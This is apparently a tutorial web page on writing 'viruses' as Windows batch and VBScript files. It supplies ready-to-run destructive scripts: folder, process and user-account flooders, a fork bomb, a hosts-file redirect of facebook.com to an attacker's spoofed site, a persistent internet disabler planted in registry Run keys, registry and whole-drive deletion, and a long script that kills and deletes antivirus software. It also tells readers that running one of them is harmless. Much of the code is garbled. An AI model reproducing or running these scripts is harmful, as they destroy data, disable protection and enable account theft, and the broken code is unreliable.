How to Create a Virus Using Batch File?
>Folder Replication Virus
A folder replication virus creates a large number of empty folders that make our Computer fuzzy and odd to look. This doesn’t have much impact on our computer, but it’s really frustrating in real-time. The program creates folders at random locations. Deleting these folders is also not an easy task as these folder may be created at any location on our drive. So, we need to manually find and delete every such folder.
I’ve made some modifications to the program and removed the complexity to illustrate you how it works. You can run this file on your computer without any hesitation. It will create infinite number of empty folders with random name. I can assure you that this program will not have any bad impact on your PC.
@echo off
cd C:Documents and SettingsusernameDesktop
:loop
md %RANDOM%
goto loop
1. The first line of the program conventionally sets the echo to off
state.
2. Then we will be moving to on the Desktop using ‘cd’ command.
3. Next I declare a loop label to iterate the block below it unconditionally. Using ‘md %RANDOM%’ command a folder is made with random name.
4. Next command ‘goto loop’ moves the control back to the label ‘loop’ and repeats the steps 3 and 4.
Note: Save the file with .bat extension and double click on it to start the folder replication virus. Just change “C:Documents and SettingsusernameDesktop” to the path where you want to create the folders. Your computer may hang when you open the directory where the folders are created.
>DNS Poisoning
Now we’ll see how a 2 lines of code can hack your personal accounts. You may have heard about spoofing of websites where a hacker creates an exact copy of the target site and hosts it on a server that has a unique IP address. He can send you a batch file programmed to change your host files there by redirecting you to the target spoofed site instead of the original site. When you click the batch file, your hosts will be modified and you are almost vulnerable. Take a look at the program.
@echo off
echo 10.184.24.35 www.facebook .com >> C:windowssystem32driversetchosts.txt
exit
The above code writes the line to your host file and whenever you type facebook.com in your browser, you will be redirected to the ip address 10.184.24.35 where the attacker has spoofed and hosted the site
>Command to remove the shortcut virus from your USB drives
del *.lnk
attrib -h -r -s /s /d e:*.*
The first command allows you to delete the ‘.lnk’ files and the next one changes the attributes of the files and makes the visible to you where ‘e’ is your USB drive letter.
Final Words
As this is a basic intro to batch files, I could only cover less number of
topics but very important ones. There is a lot more to learn. First master the
basics and explore the internet for more stuff. If you have any doubts
regarding how to create a virus using batch file then you can comment below.
>Disable Internet Permanently
This code will disable the internet connectivity permanently.
echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!
PAUSE
> Delete Key Registry Files
This will delete key registry files, then loops a message
This is dangerous and unrecoverable Notepad Virus.
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your PC has been crashed.Your Dad.
GOTO MESSAGE
>Endless Notepads
This will pop up endless notepads until the computer freezes and crashes
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
> Popping CD Drives
This will make the CD drives constantly pop out
Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop
> Endless Enter
This will make the enter button pressed continuously
SetwshShell=wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
> Application Bomber
It will start to open different applications repeatedly which will affect the system’s performance.
You can also add the application of your choice in the above code.
@echo off
:x
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x
> Flooder
This will create unlimited no. of folders.
@echo off
:x
md %random%
/folder.
goto x
>User Account Flooder
This will create large no. of the user account on one’s PC and goes on
@echo off
:xnet
user %random% /add
goto x
>Process Creator
This will create unlimited background processes
%0|%0
>Windows Hacker
This will delete your whole C:\ drive and it really unrecoverable
@Echo off
Del C:\ *.* |y
> Anti Virus Disabler
This large code will disable any antivirus installed on the system
@ echo off
rem
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmincls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.datcls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda
software\*.*
rem
x=msgbox("RED AND WHITE",0,"WELCOME TO")
ReplyDelete@echo off
ReplyDelete:x
type nul > %random%.txt